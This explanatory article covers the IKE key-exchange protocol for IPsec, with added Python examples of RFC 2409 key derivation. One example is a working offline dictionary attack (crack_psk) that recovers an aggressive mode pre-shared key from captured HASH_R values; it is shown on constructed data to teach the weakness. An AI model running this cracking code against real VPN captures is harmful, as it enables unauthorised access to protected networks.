Internet Key Exchange (IKE)
Internet Key Exchange (IKE) is the key-management protocol that complements IPsec. It negotiates Security Associations (SAs) between two peers, authenticates the peers to each other, and establishes the keys that IPsec then uses for encryption and integrity protection, doing all of this over an untrusted network such as the internet. IPsec itself only defines how packets are protected (AH and ESP); without IKE, every key and parameter has to be configured by hand.
Two versions exist: IKEv1 (RFC 2409) and IKEv2 (RFC 7296). IKEv1 worked, but its specification was spread over several documents, it needed up to nine messages to set up a tunnel, and it left features such as NAT traversal, dead-peer detection and EAP authentication to later extensions. IKEv2 consolidated the protocol into one specification, reduced setup to four messages, and built those features in, together with a cookie mechanism that resists resource-exhaustion attacks from spoofed initiators. New deployments should use IKEv2.
Benefits of using IKE
IKE adds functionality and flexibility to IPsec. IPsec can be run with manual keying, but IKE lets two peers set up a protected connection quickly because nobody has to type the IPsec parameters (keys, SPIs, algorithms) into both peers by hand, and the session keys are never handled by a human at all. Other advantages of using IKE include:
- Lifetimes can be set on IPsec SAs, after which the SA is renegotiated.
- Encryption keys can be changed (rekeyed) in the course of an IPsec session rather than staying fixed for its whole life.
- Certification authority (CA) support, so peers can authenticate with certificates instead of a separate shared secret per pair.
- Dynamic authentication of peers, so a peer is verified each time an SA is set up instead of being trusted by static configuration.
IKEv1 works in two phases.
- Phase 1: the peers authenticate each other and run a Diffie-Hellman key exchange to produce a shared secret from which the keys protecting further IKE traffic are derived. The result is one bidirectional IKE SA (also called the ISAKMP SA). The peers are authenticated with a pre-shared key, RSA signatures or RSA-encrypted nonces. Phase 1 has two modes. Main mode takes six messages and provides identity protection: the identities and the authentication hashes are sent only after the Diffie-Hellman secret is in place, so they travel encrypted. Aggressive mode takes three messages, but the identities and the responder's authentication hash are sent in the clear. With pre-shared-key authentication that hash lets a passive observer mount an offline dictionary attack on the PSK, so aggressive mode with PSKs should be avoided; where it cannot be, the PSK must be long and random.
- Phase 2: under the protection of the Phase 1 SA, the peers negotiate the IPsec SAs that will carry user traffic: protocol (ESP or AH), algorithms, lifetimes and, optionally, a fresh Diffie-Hellman exchange for perfect forward secrecy. IPsec SAs are unidirectional, so the result is a pair of SAs, one per direction, each with its own SPI and keys. The Phase 2 exchange is called quick mode and takes three messages.
IKEv2 keeps the same two-level structure (an IKE SA, then Child SAs) but drops the main/aggressive/quick terminology: IKE_SA_INIT and IKE_AUTH set up the IKE SA and the first Child SA in four messages, and CREATE_CHILD_SA negotiates further Child SAs or rekeys existing ones.
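The two phases above, carried through as an added example that is not code from the original page: a simulated IKEv1 Phase 1 with pre-shared-key authentication (Diffie-Hellman in IKE group 2, SKEYID and the HASH_I/HASH_R payloads exactly as RFC 2409 section 5 defines them, then SKEYID_d, SKEYID_a and SKEYID_e), followed by the quick mode KEYMAT derivation that gives the two unidirectional IPsec SAs different keys. HMAC-SHA1 as the negotiated prf, the ID and SA payload bytes used when calling it, and the PSK values are assumptions chosen for the example; nothing goes on the wire.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# RFC 2409 section 6.2, "Second Oakley Group" (IKE group 2): 1024-bit MODP prime,
# generator 2, reproduced from the RFC. Too small for new deployments; used here
# only because it is the group IKEv1 itself defines.
MODP_GROUP2_P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1"
    "29024E088A67CC74020BBEA63B139B22514A08798E3404DD"
    "EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245"
    "E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381"
    "FFFFFFFFFFFFFFFF", 16)
GENERATOR = 2
P_BYTES = 128        # KE payloads carry g^x as fixed-length 1024-bit octet strings
ESP_PROTOCOL_ID = 3  # protocol identifier of ESP in a Phase 2 proposal


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1's prf is HMAC over the negotiated hash; HMAC-SHA1 is assumed here."""
    return hmac.new(key, data, hashlib.sha1).digest()


def dh_keypair() -> Tuple[int, bytes]:
    """Private exponent x and the wire form of g^x mod p."""
    x = int.from_bytes(os.urandom(P_BYTES), "big")
    return x, pow(GENERATOR, x, MODP_GROUP2_P).to_bytes(P_BYTES, "big")


def dh_shared(x: int, peer_public: bytes) -> bytes:
    """g^xy from our exponent and the peer's public value, as fixed-length octets."""
    y = int.from_bytes(peer_public, "big")
    if not 1 < y < MODP_GROUP2_P - 1:  # 0, 1 and p-1 would force a trivial secret
        raise ValueError("invalid Diffie-Hellman public value")
    return pow(y, x, MODP_GROUP2_P).to_bytes(P_BYTES, "big")


def phase1_psk(psk_i: bytes, psk_r: bytes, sai_b: bytes, id_i: bytes,
               id_r: bytes) -> Optional[Tuple[bytes, bytes, bytes]]:
    """Simulated IKEv1 Phase 1 with pre-shared-key authentication (RFC 2409 s5.4).
    Each peer derives SKEYID from its own copy of the PSK, so the HASH payloads
    verify only when the copies match. Returns (SKEYID_d, SKEYID_a, SKEYID_e),
    or None if either side rejects the other's HASH."""
    cky_i, cky_r = os.urandom(8), os.urandom(8)  # ISAKMP cookies
    ni, nr = os.urandom(16), os.urandom(16)       # nonce payloads
    xi, gxi = dh_keypair()                        # initiator's KE payload
    xr, gxr = dh_keypair()                        # responder's KE payload
    gxy = dh_shared(xi, gxr)
    assert gxy == dh_shared(xr, gxi)              # both sides reach the same g^xy

    # SKEYID = prf(pre-shared-key, Ni_b | Nr_b); g^xy is deliberately not an input.
    skeyid_i, skeyid_r = prf(psk_i, ni + nr), prf(psk_r, ni + nr)

    # HASH_I = prf(SKEYID, g^xi | g^xr | CKY-I | CKY-R | SAi_b | IDii_b), sent by I
    # HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), sent by R
    hash_i_input = gxi + gxr + cky_i + cky_r + sai_b + id_i
    hash_r_input = gxr + gxi + cky_r + cky_i + sai_b + id_r
    hash_i_sent, hash_r_sent = prf(skeyid_i, hash_i_input), prf(skeyid_r, hash_r_input)

    # Each side recomputes the peer's HASH under its own SKEYID and compares in
    # constant time; a mismatch means the peer does not hold the same PSK.
    r_accepts = hmac.compare_digest(hash_i_sent, prf(skeyid_r, hash_i_input))
    i_accepts = hmac.compare_digest(hash_r_sent, prf(skeyid_i, hash_r_input))
    if not (r_accepts and i_accepts):
        return None

    # SKEYID_d/a/e = prf(SKEYID, [previous key |] g^xy | CKY-I | CKY-R | 0/1/2):
    # d seeds Phase 2 keys, a keys the HMACs on later IKE messages, e encrypts them.
    skeyid_d = prf(skeyid_i, gxy + cky_i + cky_r + b"\x00")
    skeyid_a = prf(skeyid_i, skeyid_d + gxy + cky_i + cky_r + b"\x01")
    skeyid_e = prf(skeyid_i, skeyid_a + gxy + cky_i + cky_r + b"\x02")
    return skeyid_d, skeyid_a, skeyid_e


def quick_mode_keymat(skeyid_d: bytes, spi: bytes, ni: bytes, nr: bytes,
                      nbytes: int) -> bytes:
    """Phase 2 keying material without PFS (RFC 2409 s5.5), expanded as needed:
    K1 = prf(SKEYID_d, protocol | SPI | Ni_b | Nr_b),
    Kn = prf(SKEYID_d, K(n-1) | protocol | SPI | Ni_b | Nr_b), KEYMAT = K1 | K2 | ...
    Ni/Nr are fresh quick mode nonces; the SPI belongs to one IPsec SA."""
    seed = bytes([ESP_PROTOCOL_ID]) + spi + ni + nr
    keymat, k = b"", b""
    while len(keymat) < nbytes:
        k = prf(skeyid_d, k + seed)
        keymat += k
    return keymat[:nbytes]


def quick_mode_sa_pair(skeyid_d: bytes, key_bytes: int = 32) -> Tuple[bytes, bytes]:
    """Keys for the two unidirectional IPsec SAs one quick mode exchange creates.
    Each SA carries the SPI chosen by its receiver, so the directions differ.
    Returns (key for I->R, key for R->I)."""
    ni, nr = os.urandom(16), os.urandom(16)
    spi_i, spi_r = os.urandom(4), os.urandom(4)   # SPIs picked by I and by R
    return (quick_mode_keymat(skeyid_d, spi_r, ni, nr, key_bytes),
            quick_mode_keymat(skeyid_d, spi_i, ni, nr, key_bytes))
```

Calling phase1_psk with the same PSK on both sides returns the three derived keys; with different PSKs the HASH checks fail and it returns None, which is the only signal a real responder gets that the initiator is not who it claims. Passing one SKEYID_d to quick_mode_sa_pair shows that the inbound and outbound ESP keys differ even though they come from the same Phase 1 SA, because each direction's SPI feeds the derivation.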
Methods of peer authentication
IKEv1 provides three methods of peer authentication:
- Pre-shared keys: both peers hold the same secret. This is the simplest method, but the secret's strength is all that protects the authentication, and in aggressive mode the secret is exposed to offline guessing.
- RSA-encrypted nonces: each peer encrypts a nonce to the other's public key. This requires the peers' public keys to be available to each other beforehand and is rarely used in practice.
- RSA signatures: each peer signs the exchange with its private key and proves ownership of that key with an X.509 certificate, typically issued by a CA. This is the method that scales to many peers.
IKEv2 additionally supports EAP, which lets a remote-access client authenticate with a username and password or a token while the gateway authenticates with a certificate.
IKE protects the integrity of its own messages with keyed hashes (HMAC; in IKEv1 the key is SKEYID_a), so a message that has been altered in transit is rejected. When the lifetime of an SA expires, the peers rekey: a new SA is negotiated before the old one lapses so that traffic continues, and an SA that has expired without a replacement is deleted and must be established afresh.
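The following added example (not code from the original page) shows why the choice of authentication method and mode matters and what the HMAC integrity check looks like. It reproduces the HASH_R computation from RFC 2409 section 5.4 on a constructed stand-in for a capture of aggressive mode messages 1 and 2, recovers the PSK from a small wordlist with no interaction with the gateway, and then computes and verifies the HASH(1) keyed hash that protects the first quick mode message, showing that an altered message fails the check. HMAC-SHA1 as the prf, the ID_IPV4_ADDR identity 192.0.2.1, the wordlist and every captured value are constructed assumptions; no real traffic is involved.

```python
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 prf, assumed HMAC-SHA1 (the negotiated hash is visible in the SA payload)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def hash_r(psk: bytes, c: Dict[str, bytes]) -> bytes:
    """HASH_R for pre-shared-key authentication (RFC 2409 s5.4):
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Every input except the PSK is carried in the clear, and g^xy is not needed,
    so anyone holding the capture can evaluate this for any PSK guess."""
    skeyid = prf(psk, c["ni"] + c["nr"])
    return prf(skeyid, c["gxr"] + c["gxi"] + c["cky_r"] + c["cky_i"] + c["sai_b"] + c["id_r"])


def aggressive_mode_capture(psk: bytes) -> Dict[str, bytes]:
    """Constructed stand-in for a packet capture of aggressive mode messages 1
    and 2. Nothing here is real traffic: cookies, nonces, the SA body and the DH
    public values are random bytes (the attack never uses the exponents, and
    SAi_b is copied verbatim from message 1, so its structure does not matter);
    IDir is ID_IPV4_ADDR 192.0.2.1. HASH_R is computed exactly as the responder
    would compute it and, in aggressive mode, is sent unencrypted."""
    c = {
        "cky_i": os.urandom(8), "cky_r": os.urandom(8),
        "ni": os.urandom(16), "nr": os.urandom(16),
        "gxi": os.urandom(128), "gxr": os.urandom(128),
        "sai_b": os.urandom(40),
        "id_r": b"\x01\x00\x00\x00" + bytes([192, 0, 2, 1]),
    }
    c["hash_r"] = hash_r(psk, c)
    return c


def crack_psk(capture: Dict[str, bytes], wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack on an aggressive mode PSK: recompute HASH_R for
    each candidate and compare with the captured value. The gateway is never
    contacted, so lockouts and authentication logs never trigger."""
    for candidate in wordlist:
        if hash_r(candidate, capture) == capture["hash_r"]:
            return candidate
    return None


def quick_mode_hash1(skeyid_a: bytes, msg_id: bytes, rest_of_message: bytes) -> bytes:
    """HASH(1) = prf(SKEYID_a, M-ID | SA | Ni [| KE] [| IDci | IDcr]) (RFC 2409 s5.5):
    the keyed hash on the first quick mode message. msg_id is the 4-byte ISAKMP
    message ID; rest_of_message is everything after the HASH payload, payload
    headers included, without encryption padding."""
    return prf(skeyid_a, msg_id + rest_of_message)


def verify_quick_mode_hash1(skeyid_a: bytes, msg_id: bytes, rest_of_message: bytes,
                            received: bytes) -> bool:
    """Receiver-side check, in constant time so a forger learns nothing from timing."""
    return hmac.compare_digest(quick_mode_hash1(skeyid_a, msg_id, rest_of_message), received)
```

In main mode the same HASH_R travels inside the Phase 1 encryption, so the observer has nothing to test candidates against; that is the whole difference between the two modes from an attacker's point of view. The integrity check at the end is what makes SKEYID_a matter: a peer that does not hold it cannot produce a HASH(1) that verifies, and any change to the message ID or the payloads after the hash was computed makes verification fail.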